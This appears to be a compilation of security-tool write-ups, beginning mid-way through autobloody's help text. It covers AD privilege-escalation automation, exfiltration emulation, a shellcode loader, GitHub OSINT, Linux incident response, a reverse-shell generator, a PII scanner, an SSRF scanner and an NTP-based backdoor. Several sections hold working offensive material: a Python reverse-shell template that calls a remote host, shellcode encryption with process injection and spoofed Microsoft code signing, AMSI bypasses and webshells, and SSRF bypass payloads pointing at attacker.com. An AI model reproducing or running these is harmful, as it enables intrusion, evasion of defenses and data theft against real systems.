-d DOMAIN, --domain DOMAIN
Domain used for NTLM authentication
-u USERNAME, --username USERNAME
Username used for NTLM authentication
-p PASSWORD, --password PASSWORD
Cleartext password or LMHASH:NTHASH for NTLM authentication
-k, --kerberos
-c CERTIFICATE, --certificate CERTIFICATE
Certificate authentication, e.g: "path/to/key:path/to/cert"
-s, --secure Try to use LDAP over TLS aka LDAPS (default is LDAP)
--host HOST Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)

How it works

First, a privesc path is found using Dijkstra's algorithm as implemented in Neo4j's GDS library. Dijkstra's algorithm solves the shortest-path problem on a weighted graph. By default the edges created by BloodHound don't have a weight but a type (e.g. MemberOf, WriteOwner). A weight is therefore added to each edge according to the type of edge and the type of node reached (e.g. user, group, domain).
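
As an illustration of the weighting idea (a sketch with made-up weights, using networkx in place of Neo4j's GDS library):

import networkx as nx

# Hypothetical weights: cheaper edges are preferred by Dijkstra's algorithm
WEIGHTS = {"MemberOf": 0, "GenericAll": 1, "ForceChangePassword": 3}

g = nx.DiGraph()
g.add_edge("JOHN.DOE@BLOODY.LOCAL", "HELPDESK@BLOODY.LOCAL",
           weight=WEIGHTS["MemberOf"])
g.add_edge("HELPDESK@BLOODY.LOCAL", "ADMIN@BLOODY.LOCAL",
           weight=WEIGHTS["ForceChangePassword"])
g.add_edge("ADMIN@BLOODY.LOCAL", "BLOODY.LOCAL",
           weight=WEIGHTS["GenericAll"])

path = nx.dijkstra_path(g, "JOHN.DOE@BLOODY.LOCAL", "BLOODY.LOCAL")
print(" -> ".join(path))  # the privesc chain that would then be executed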

Once a path is generated, autobloody will connect to the DC, execute the path and clean up whatever is reversible (everything except ForcePasswordChange and setOwner).

Limitations

Only the following BloodHound edges are currently supported for automatic exploitation:

  • MemberOf
  • ForceChangePassword
  • AddMembers
  • AddSelf
  • DCSync
  • GetChanges/GetChangesAll
  • GenericAll
  • WriteDacl
  • GenericWrite
  • WriteOwner
  • Owns
  • Contains
  • AllExtendedRights


NetLlix - A Project Created With An Aim To Emulate And Test Exfiltration Of Data Over Different Network Protocols


A project created with the aim of emulating and testing exfiltration of data over different network protocols. The emulation is performed without the use of native APIs. This will help blue teams write correlation rules to detect any type of C2 communication or data exfiltration.


Currently, this project can help generate HTTP/HTTPS traffic (both GET and POST) using the below-mentioned programming/scripting languages (a minimal raw-socket sketch follows the list):

  • CNet/WebClient: Developed in C to generate network traffic using the well-known WIN32 APIs (WININET & WINHTTP) and raw socket programming.
  • HashNet/WebClient: A C# binary to generate network traffic using .NET classes like HttpClient, WebRequest and raw sockets.
  • PowerNet/WebClient: PowerShell scripts to generate network traffic using socket programming.
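
The raw-socket variants boil down to hand-writing the HTTP request. A minimal Python equivalent (the server address is illustrative):

import socket

HOST, PORT = "192.168.1.10", 80

request = (
    "GET /exfil HTTP/1.1\r\n"
    f"Host: {HOST}\r\n"
    "Connection: close\r\n\r\n"
)
with socket.create_connection((HOST, PORT)) as s:
    s.sendall(request.encode())
    response = b""
    while chunk := s.recv(4096):
        response += chunk
print(response.decode(errors="replace"))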

Usage:

Download the latest ZIP from releases.

Running the server:

  • With SSL: python3 HTTP-S-EXFIL.py ssl

  • Without SSL: python3 HTTP-S-EXFIL.py

Running the client:

  • CNet - CNet.exe <Server-IP-ADDRESS> - Select any option
  • HashNet - ChashNet.exe <Server-IP-ADDRESS> - Select any option
  • PowerNet - .\PowerHttp.ps1 -ip <Server-IP-ADDRESS> -port <80/443> -method <GET/POST>


laZzzy - Shellcode Loader, Developed Using Different Open-Source Libraries, That Demonstrates Different Execution Techniques


laZzzy is a shellcode loader that demonstrates different execution techniques commonly employed by malware. laZzzy was developed using different open-source header-only libraries.

Features

  • Direct syscalls and native (Nt*) functions (not all functions but most)
  • Import Address Table (IAT) evasion
  • Encrypted payload (XOR and AES); a minimal XOR sketch follows this list
    • Randomly generated key
    • Automatic padding (if necessary) of payload with NOPs (\x90)
    • Byte-by-byte in-memory decryption of payload
  • XOR-encrypted strings
  • PPID spoofing
  • Blocking of non-Microsoft-signed DLLs
  • (Optional) Cloning of PE icon and attributes
  • (Optional) Code signing with spoofed cert
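
A minimal sketch of the XOR payload-preparation step (not laZzzy's builder code; the block size is an assumption):

import os

def xor_prepare(shellcode: bytes, block: int = 16):
    pad = (-len(shellcode)) % block
    padded = shellcode + b"\x90" * pad  # pad with NOPs if necessary
    key = os.urandom(16)                # randomly generated key
    enc = bytes(b ^ key[i % len(key)] for i, b in enumerate(padded))
    return enc, key

enc, key = xor_prepare(b"\xcc" * 45)
print(f"key={key.hex()} length={len(enc)}")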

How to Use

Requirements:

  • Windows machine w/ Visual Studio and the following components, which can be installed from Visual Studio Installer > Individual Components:

    • C++ Clang Compiler for Windows and C++ Clang-cl for build tools

    • ClickOnce Publishing

  • Python3 and the required modules:

    • python3 -m pip install -r requirements.txt

Options:

(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -h

โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โฃ€โฃ€โฃ€โก€โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โฃ โฃคโฃคโฃคโฃคโ €โข€โฃผโ Ÿโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ € โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โ €โ €โข€โฃ€โฃ€โก€โ €โ €โ €โข€โฃ€โฃ€โฃ€โฃ€โฃ€โก€โ €โข€โฃผโกฟโ โ €โ ›โ ›โ ’โ ’โข€โฃ€โก€โ €โ €โ €โฃ€โก€โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โฃฐโฃพโ Ÿโ ‹โ ™โขปโฃฟโ €โ €โ ›โ ›โข›โฃฟโฃฟโ โ €โฃ โฃฟโฃฏโฃคโฃคโ „โ €โ €โ €โ €โ ˆโขฟโฃทโก€โ €โฃฐโฃฟโ ƒโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โฃฟโฃฏ โ €โ €โขธโฃฟโ €โ €โ €โฃ โฃฟโกŸโ โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ ˆโขฟโฃงโฃฐโฃฟโ ƒโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โ ™โ ฟโฃทโฃฆโฃดโขฟโฃฟโ „โข€โฃพโฃฟโฃฟโฃถโฃถโฃถโ †โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ ˜โฃฟโกฟโ ƒโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ € โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โฃผโกฟโ โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €by: CaptMeeloโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ ˆโ ‰โ โ €โ €โ €

usage: builder.py [-h] -s -p -m [-tp] [-sp] [-pp] [-b] [-d]

options:
-h, --help show this help message and exit
-s path to raw shellcode
-p password
-m shellcode execution method (e.g. 1)
-tp process to inject (e.g. svchost.exe)
-sp process to spawn (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-pp parent process to spoof (e.g. explorer.exe)
-b binary to spoof metadata (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-d domain to spoof (e.g. www.microsoft.com)

shellcode execution method:
1 Early-bird APC Queue (requires sacrificial process)
2 Thread Hijacking (requires sacrificial process)
3 KernelCallbackTable (requires sacrificial process that has GUI)
4 Section View Mapping
5 Thread Suspension
6 LineDDA Callback
7 EnumSystemGeoID Callback
8 FLS Callback
9 SetTimer
10 Clipboard

Example:

Execute builder.py and supply the necessary data.

(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -s .\calc.bin -p CaptMeelo -m 1 -pp explorer.exe -sp C:\\Windows\\System32\\notepad.exe -d www.microsoft.com -b C:\\Windows\\System32\\mmc.exe

โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โฃ€โฃ€โฃ€โก€โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โฃ โฃคโฃคโฃคโฃคโ €โข€ โ Ÿโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โ €โ €โข€โฃ€โฃ€โก€โ €โ €โ €โข€โฃ€โฃ€โฃ€โฃ€โฃ€โก€โ €โข€โฃผโกฟโ โ €โ ›โ ›โ ’โ ’โข€โฃ€โก€โ €โ €โ €โฃ€โก€โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โฃฐโฃพโ Ÿโ ‹โ ™โขปโฃฟโ €โ €โ ›โ ›โข›โฃฟโฃฟโ โ €โฃ โฃฟโฃฏโฃคโฃคโ „โ €โ €โ €โ €โ ˆโขฟโฃทโก€โ €โฃฐโฃฟโ ƒ โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โฃฟโฃฏโ €โ €โ €โขธโฃฟโ €โ €โ €โฃ โฃฟโกŸโ โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ ˆโขฟโฃงโฃฐโฃฟโ ƒโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โ ™โ ฟโฃทโฃฆโฃดโขฟโฃฟโ „โข€โฃพโฃฟโฃฟโฃถโฃถโฃถโ †โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ ˜โฃฟโกฟโ ƒโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ € โ €โ €โ €โ €
โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โฃผโกฟโ โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €by: CaptMeeloโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ ˆโ ‰โ โ €โ €โ €

[+] XOR-encrypting payload with
[*] Key: d3b666606468293dfa21ce2ff25e86f6

[+] AES-encrypting payload with
[*] IV: f96312f17a1a9919c74b633c5f861fe5
[*] Key: 6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec

[+] Modifying template using
[*] Technique: Early-bird APC Queue
[*] Process to inject: None
[*] Process to spawn: C:\\Windows\\System32\\RuntimeBroker.exe
[*] Parent process to spoof: svchost.exe

[+] Spoofing metadata
[*] Binary: C:\\Windows\\System32\\RuntimeBroker.exe
[*] CompanyName: Microsoft Corporation
[*] FileDescription: Runtime Broker
[*] FileVersion: 10.0.22621.608 (WinBuild.160101.0800)
[*] InternalName: RuntimeBroker.exe
[*] LegalCopyright: ยฉ Microsoft Corporation. All rights reserved.
[*] OriginalFilename: RuntimeBroker.exe
[*] ProductName: Microsoftยฎ Windowsยฎ Operating System
[*] ProductVersion: 10.0.22621.608

[+] Compiling project
[*] Compiled executable: C:\MalDev\laZzzy\loader\x64\Release\laZzzy.exe

[+] Signing binary with spoofed cert
[*] Domain: www.microsoft.com
[*] Version: 2
[*] Serial: 33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6
[*] Subject: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com
[*] Issuer: /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA 06
[*] Not Before: October 04 2022
[*] Not After: September 29 2023
[*] PFX file: C:\MalDev\laZzzy\output\www.microsoft.com.pfx

[+] All done!
[*] Output file: C:\MalDev\laZzzy\output\RuntimeBroker.exe
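The output above shows the builder's two-stage scheme: the raw shellcode is first XOR-encrypted with a random 16-byte key, then AES-encrypted with a random IV and a 256-bit key. A minimal Python sketch of that flow (illustrative only; laZzzy's real implementation may differ, and both the pycryptodome dependency and the CBC mode below are assumptions):

#pip install pycryptodome
import os
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

def encrypt_payload(shellcode):
    #Stage 1: XOR with a random 16-byte key (32 hex chars, as in the output above)
    xor_key = os.urandom(16)
    xored = bytes(b ^ xor_key[i % 16] for i, b in enumerate(shellcode))

    #Stage 2: AES-256 with a random 16-byte IV and 32-byte key (CBC assumed)
    iv, aes_key = os.urandom(16), os.urandom(32)
    encrypted = AES.new(aes_key, AES.MODE_CBC, iv).encrypt(pad(xored, 16))

    print(f"[*] XOR key: {xor_key.hex()}")
    print(f"[*] IV: {iv.hex()}")
    print(f"[*] Key: {aes_key.hex()}")
    return encrypted

encrypted = encrypt_payload(open("calc.bin", "rb").read())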

Libraries Used

Shellcode Execution Techniques

  1. Early-bird APC Queue (requires sacrificial process)
  2. Thread Hijacking (requires sacrificial process)
  3. KernelCallbackTable (requires sacrificial process that has a GUI)
  4. Section View Mapping
  5. Thread Suspension
  6. LineDDA Callback
  7. EnumSystemGeoID Callback
  8. Fiber Local Storage (FLS) Callback
  9. SetTimer
  10. Clipboard

Notes:

  • Only works on Windows x64
  • Debugging only works on Release mode
  • Sometimes, KernelCallbackTable doesn't work on the first run but will eventually work afterward

Credits/References



Octosuite - Advanced Github OSINT Framework


A framework for gathering OSINT on GitHub users, repositories and organizations


Wiki

Refer to the Wiki for installation instructions, in addition to all other documentation.

Features

  • Fetches an organization's profile information
  • Fetches an organization's events
  • Returns an organization's repositories
  • Returns an organization's public members
  • Fetches a repository's information
  • Returns a repository's contributors
  • Returns a repository's languages
  • Fetches a repository's stargazers
  • Fetches a repository's forks
  • Fetches a repository's releases
  • Returns a list of files in a specified path of a repository
  • Fetches a user's profile information
  • Returns a user's gists
  • Returns organizations that a user owns/belongs to
  • Fetches a user's events
  • Fetches a list of users followed by the target
  • Fetches a user's followers
  • Checks if user A follows user B
  • Checks if a user is a public member of an organization
  • Returns a user's subscriptions
  • Searches users
  • Searches repositories
  • Searches topics
  • Searches issues
  • Searches commits
  • Automatically logs network activity (.logs folder)
  • User can view, read and delete logs
  • ...And more

Note

Octosuite automatically logs network and user activity of each session; the logs are saved by date and time in the .logs folder
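Most of the features listed above map directly onto GitHub's public REST API. A rough sketch of how a user profile and their organizations might be fetched (these are the documented api.github.com endpoints, but this is not Octosuite's actual code):

import requests

API = "https://api.github.com"

def user_profile(username):
    #Public endpoint; no token needed for low-volume queries
    response = requests.get(f"{API}/users/{username}", timeout=10)
    response.raise_for_status()
    return response.json()

def user_orgs(username):
    response = requests.get(f"{API}/users/{username}/orgs", timeout=10)
    response.raise_for_status()
    return response.json()

profile = user_profile("octocat")
print(profile["name"], "-", profile["public_repos"], "public repos")
print([org["login"] for org in user_orgs("octocat")])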



Pylirt - Python Linux Incident Response Toolkit


This application aims to accelerate incident response processes by collecting information from Linux operating systems.


Features

Information is collected from the following files and commands:

/etc/passwd

cat /etc/group

cat /etc/sudoers

lastlog

cat /var/log/auth.log

uptime

/proc/meminfo

ps aux

/etc/resolv.conf

/etc/hosts

iptables -L -v -n

find / -type f -size +512k -exec ls -lh {} \;

find / -mtime -1 -ls

ip a

netstat -nap

arp -a

echo $PATH

Installation

git clone https://github.com/anil-yelken/pylirt

cd pylirt

sudo pip3 install paramiko

Usage

The following information should be specified in the cred_list.txt file:

IP|Username|Password

sudo python3 plirt.py
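A minimal sketch of the collection loop this implies: read IP|Username|Password triples from cred_list.txt, SSH in with paramiko, and save each command's output per host (the command list and output file naming below are assumptions for illustration, not pylirt's exact code):

import paramiko

COMMANDS = ["cat /etc/passwd", "lastlog", "ps aux", "ip a", "arp -a"]

with open("cred_list.txt") as f:
    creds = [line.strip().split("|") for line in f if line.strip()]

for ip, username, password in creds:
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(ip, username=username, password=password, timeout=10)
    #One output file per host, one section per command
    with open(f"{ip}_collection.txt", "w") as out:
        for cmd in COMMANDS:
            _, stdout, _ = client.exec_command(cmd)
            out.write(f"### {cmd}\n{stdout.read().decode(errors='replace')}\n")
    client.close()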

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Shells - Little Script For Generating Revshells


A script for generating common revshells fast and easily.
Especially nice when in need of PowerShell and Python revshells, which can be a PITA to get correctly formatted.
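To see why the formatting matters, here is the kind of templating such a generator performs for a classic Python reverse shell: the whole payload has to be collapsed onto one line with the quoting kept intact (a sketch; the script's own templates will differ):

PY_REVSHELL = (
    "python3 -c 'import socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    's.connect(("{ip}",{port}));'
    "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
    'subprocess.call(["/bin/sh","-i"])\''
)

def build(ip, port):
    #Substitute listener details into the one-liner template
    return PY_REVSHELL.format(ip=ip, port=port)

print(build("10.10.14.2", 443))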

PowerShell revshells

  • Shows username@computer and the working directory above the prompt
  • Has a partial AMSI-bypass, making some stuff a bit easier
  • TCP and UDP
  • Windows Powershell and Core Powershell
  • Functions for uploading and downloading files. (Using Updog by sc0tfree)

ngrok support

  • ngrok can be started/stopped from inside the script
  • payloads will be generated with the ngrok addresses

Updog support

  • you can start/stop Updog from inside the script
  • The PowerShell revshells have upload/download function embedded
  • To upload from nix using curl: curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload

To install Shells

git clone https://github.com/4ndr34z/shells
cd shells
./install.sh

Screenshots

Youtube video


Version 1.4.6

  • Added webshells (ASPX, PHP, JSP)

Version 1.4.5

  • Added 2 c++ revshell binaries for Windows 32 and 64 bit.

Version 1.4.4

  • Fixed the handling of starting/stopping Updog

Version 1.4.3

  • Added Updog support
  • Added Netcat binaries.
  • Powershell: Created upload/download functionality (upload requires Updog for receiving files)
  • Added more information about running ngrok and Updog.

Version 1.4.2

  • PowerShell: Added a new "mini AMSI-bypass" (it is a partial bypass), based on Matt Graeber's Reflection method
  • PowerShell: Added an "upload" function to the PowerShell reverse shell

Version 1.4.1

  • Removed AMSI. Not tested enough :-)

Version 1.4

  • Added AMSI-bypass for the powershell payloads

Version 1.3.9

  • Fixed bug when setting port
  • Changed default port to 443
  • PowerShell: obfuscated some more

Version 1.3.8

  • PowerShell: Minor changes to the UDP payload

Version 1.3.7

  • Using only native nc on macOS, because the one on homebrew doesn't work on incoming UDP
  • PowerShell: Added UDP payloads

Version 1.3.6

  • PowerShell: Added more payloads

Version 1.3.5

Version 1.3.4

  • PowerShell: Using UTF8 encoding in payload

Version 1.3.3

  • Added Golang

Version 1.3.2

  • Added OpenSSL

Version 1.3.1

  • Fixed bug in Python revshell
  • Added awk
  • Added Bash UDP

Version 1.3

  • Added Windows Python revshells

Version 1.2.9

  • Added a ngrok running-status

Version 1.2.8

  • Hiding ngrok choice if not installed

Version 1.2.7

  • Fixed the install options: not doing default option when pressing enter without making a choice

Version 1.2.6

  • Added support for ngrok.

Version 1.2.4

  • Added a install-script
  • Added install options for checking and installing missing dependencies

Version 1.2.3

  • Added a couple of PHP shells

Version 1.2.2

  • Added shells for: Ruby, Perl, Telnet and zsh

Version 1.2.1

  • Added copy to clipboard using pbcopy on macOS
  • Added info about the listening netcat, as the macOS versions don't display that

Version 1.2

  • Added looping netcat shells. Calls back every 10 seconds. Great in case you lose your shell
  • Added a check for GNU netcat 0.7.0 (Homebrew) when running on macOS

Version 1.1

  • Added support for macOS


Octopii - An AI-powered Personal Identifiable Information (PII) Scanner


Octopii is an open-source AI-powered Personal Identifiable Information (PII) scanner that can look for image assets such as Government IDs, passports, photos and signatures in a directory.


Working

Octopii uses Tesseract's Optical Character Recognition (OCR) and Keras' Convolutional Neural Networks (CNN) models to detect various forms of personal identifiable information that may be leaked on a publicly facing location. This is done in the following steps:

1. Importing and cleaning image(s)

The image is imported via OpenCV and Python Imaging Library (PIL) and is cleaned, deskewed and rotated for scanning.

2. Performing image classification and Optical Character Recognition (OCR)

A directory is looped over and searched for images. These images are scanned for unique features via the image classifier (done by comparing it to a trained model), along with OCR for finding substrings within the image. This may have one of the following outcomes:

  • Best case (score >=90): The image is sent into the image classifier algorithm to be scanned for features such as an ISO/IEC 7810 card specification, colors, location of text, photos, holograms etc. If it is successfully classified as a type of PII, OCR is performed on it looking for particular words and strings as a final check. When both of these are confirmed, the result from Octopii is extremely reliable.

  • Average case (score >=50): The image is partially/incorrectly identified by the image classifier algorithm, but an OCR check finds contradicting substrings and reclassifies it.

  • Worst case (score >=0): The image is only identified by the image classifier algorithm but an OCR scan returns no results.

  • Incorrect classification: False positives due to a very small model or OCR list may incorrectly classify PIIs, giving inaccurate results.

As a final verification method, images are scanned for certain strings to verify the accuracy of the model.

The accuracy of the scan can be determined via the confidence scores in the output. If all the mentioned conditions are met, a score of 100.0 is returned.

To train the model, data can also be fed into the model_generator.py script, and the newly improved h5 file can be used.

Usage

  1. Install all dependencies via pip install -r requirements.txt.
  2. Install the Tesseract helper locally via sudo apt install tesseract-ocr -y (for Ubuntu/Debian).
  3. To run Octopii, type python3 octopii.py <location name>, for example python3 octopii.py pii_list/
python3 octopii.py <location to scan> <additional flags>

Octopii currently supports local scanning and scanning S3 directories and open directory listings via their URLs.

Example

Contributing

Open-source projects like these thrive on community support. Since Octopii relies heavily on machine learning and optical character recognition, contributions are much appreciated. Here's how to contribute:

1. Fork

Fork the official repository at https://github.com/redhuntlabs/octopii

2. Understand

There are 3 files in the models/ directory:

  • The keras_models.h5 file is the Keras h5 model that can be obtained from Google's Teachable Machine or via Keras in Python.
  • The labels.txt file contains the list of labels corresponding to the index that the model returns.
  • The ocr_list.json file consists of keywords to search for during an OCR scan, as well as other miscellaneous information such as country of origin, regular expressions etc.

Generating models via Teachable Machine

Since our current dataset is quite small, we could benefit from a large Keras model of international PII for this project. If you do not have expertise in Keras, Google provides an extremely easy to use model generator called the Teachable Machine. To use it:

  • Visit https://teachablemachine.withgoogle.com/train and select 'Image Project' โ†’ 'Standard Image Model'.
  • A few classes are visible. Rename each class to an asset type you'd like to upload, such as "German Passport" or "California Driver License".
  • Add images by clicking the 'Upload' button and upload some image assets. Note: images have to be square

Tip: segregate your image assets into folders with the folder name being the same as the class name. You can then drag and drop a folder into the upload dialog.

  • Click '+ Add a class' at the bottom of the page to add more classes with data and repeat. You can make the classes more specific, such as "Goa Driver License Old Format".

Note: Only upload images that match the class name; for example, the German Passport class must contain only German passport pictures. Uploading the wrong data to the wrong class will confuse the machine learning algorithms.

  • Verify the classes and images one last time. Once you're ready, click on the 'Train Model' button. You can increase the epoch size (such as 5000) to improve model accuracy.
  • To test the model, click the Input dropdown, select 'File', and upload a sample image.
  • Once you're ready, click the 'Export Model' button. In the dialog that pops up, select the 'Tensorflow' tab (not Tensorflow.js) and select the 'Keras' radio button, then click 'Download my model' to export the newly generated model. Extract the downloaded zip file and paste the keras_model.h5 file and labels.txt file into the models/ directory in Octopii.

The images used for the model above are not visible to us since they're in a proprietary format. You can use both dummy and actual PII. Make sure they are square-ish in image size.

Updating OCR list

Once you generate models using Teachable Machine, you can improve Octopii's accuracy via OCR. To do this:

  • Open the existing ocr_list.json file. Create a JSONObject with the key having the same name as the asset class. NOTE: The key name must be exactly the same as the asset class name from Teachable Machine.
  • For the keywords, use as many unique terms from your asset as possible, such as "Income Tax Department". Store them in a JSONArray.
  • (Advanced) you can also add regexes for things like ID numbers and MRZ on passports if they are unique enough. Use https://regex101.com to test your regexes before adding them.
  • Save/overwrite the existing ocr_list.json file. (A sketch of building such an entry follows this list.)
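Putting those steps together, a new entry could be assembled and merged like this (a sketch only; the exact schema keys used below, keywords, country and regexes, are assumptions based on the description above, so mirror an existing entry in the real file):

import json

new_entry = {
    "German Passport": {
        #Key must exactly match the Teachable Machine class name
        "country": "DE",  #ISO 3166-1 alpha-2 code
        "keywords": ["Bundesrepublik Deutschland", "Reisepass", "Passport"],
        "regexes": ["^P<D<<"]  #e.g. the start of a German passport MRZ (illustrative)
    }
}

with open("models/ocr_list.json") as f:
    ocr_list = json.load(f)

ocr_list.update(new_entry)

with open("models/ocr_list.json", "w") as f:
    json.dump(ocr_list, f, indent=4, ensure_ascii=False)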

3. Edit

You can replace each file you modify in the models/ directory after you create or edit them via the above methods.

4. Pull request

Submit a pull request from your forked repo and we'll pick it up and replace our current model with it if the changes are large enough.

Note: Please take the following steps to ensure quality

  • Make sure the model returns extremely accurate results by testing it locally first.
  • Use proper text casing for label names in both the Keras model and ocr_list.json.
  • Make sure all JSON is valid with appropriate character escapes with no duplicate keys, regexes or keywords.
  • For country names, please use the ISO 3166-1 alpha-2 code of the country.

Credits

License

MIT License

(c) Copyright 2022 RedHunt Labs Private Limited

Author: Owais Shaikh



autoSSRF - Smart Context-Based SSRF Vulnerability Scanner


autoSSRF is your best ally for identifying SSRF vulnerabilities at scale. Unlike other SSRF automation tools, it comes with the following two original features:

  • Smart fuzzing on relevant SSRF GET parameters

    When fuzzing, autoSSRF only focuses on the common parameters related to SSRF (?url=, ?uri=, ..) and doesn't interfere with everything else. This ensures that the original URL is still correctly understood by the tested web application, something that might not happen with a tool that blindly sprays query parameters.

  • Context-based dynamic payloads generation

    For the given URL https://host.com/?fileURL=https://authorizedhost.com, autoSSRF would recognize authorizedhost.com as a potentially white-listed host for the web application, and generate payloads dynamically based on that, attempting to bypass the white-listing validation. This results in interesting payloads such as http://authorizedhost.attacker.com, http://authorizedhost%252F@attacker.com, etc.

Furthermore, this tool guarantees almost no false-positives. The detection relies on the great ProjectDiscoveryโ€™s interactsh, allowing autoSSRF to confidently identify out-of-band DNS/HTTP interactions.
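As an illustration of the payload-generation idea: take the host from the parameter value, treat it as allow-listed, and derive bypass candidates around an attacker-controlled domain. A rough sketch (not the tool's actual code; the interactsh callback domain below is an assumption):

from urllib.parse import urlparse

def generate_payloads(param_value, attacker):
    #e.g. param_value = "https://authorizedhost.com"
    allowed = urlparse(param_value).netloc
    return [
        f"http://{allowed}.{attacker}",       #allow-listed host as attacker subdomain
        f"http://{allowed}%252F@{attacker}",  #double-encoded slash before the credentials separator
        f"http://{attacker}/{allowed}",       #allow-listed host in the path
        f"http://{attacker}#{allowed}",       #allow-listed host in the fragment
    ]

print(generate_payloads("https://authorizedhost.com", "attacker.interact.sh"))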


Usage

python3 autossrf.py -h

This displays help for the tool.

usage: autossrf.py [-h] [--file FILE] [--url URL] [--output] [--verbose]

options:
-h, --help show this help message and exit
--file FILE, -f FILE file of all URLs to be tested against SSRF
--url URL, -u URL url to be tested against SSRF
--output, -o output file path
--verbose, -v activate verbose mode

Single URL target:

python3 autossrf.py -u https://www.host.com/?param1=X&param2=Y&param2=Z

Multiple URLs target with verbose:

python3 autossrf.py -f urls.txt -v

Installation

1 - Clone

git clone https://github.com/Th0h0/autossrf.git

2 - Install requirements

Python libraries :

cd autossrf 
pip install -r requirements.txt

Interactsh-Client :

go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

License

autoSSRF is distributed under the MIT License.



Sandman - NTP Based Backdoor For Red Team Engagements In Hardened Networks


Sandman is a backdoor that is meant to work on hardened networks during red team engagements.

Sandman works as a stager and leverages NTP (a protocol to sync time & date) to get and run an arbitrary shellcode from a pre-defined server.

Since NTP is a protocol that is overlooked by many defenders, it usually enjoys wide network accessibility.
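For a sense of why NTP makes a convenient covert channel: a normal client exchange is a single 48-byte UDP datagram on port 123, and anything appended to those 48 bytes is rarely inspected. The sketch below sends a standard NTP request and looks for extra data behind a magic header; it is purely illustrative of the mechanism, and the magic value shown is hypothetical (Sandman defines its own wire format):

import socket

MAGIC = b"\xde\xad\xbe\xef"  #hypothetical marker, not Sandman's real header

def ntp_poll(server):
    packet = b"\x1b" + 47 * b"\x00"  #LI=0, VN=3, Mode=3 (client request)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(5)
        s.sendto(packet, (server, 123))
        reply, _ = s.recvfrom(4096)
    #A legitimate reply is exactly 48 bytes; marked trailing data would be
    #the smuggled payload chunk
    if len(reply) > 48 and reply[48:52] == MAGIC:
        return reply[52:]
    return b""

chunk = ntp_poll("pool.ntp.org")  #benign server: returns an empty payload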


Usage

SandmanServer (Usage)

Run on windows / *nix machine:

python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
  • Network Adapter: The adapter that you want the server to listen on (for example Ethernet for Windows, eth0 for *nix).

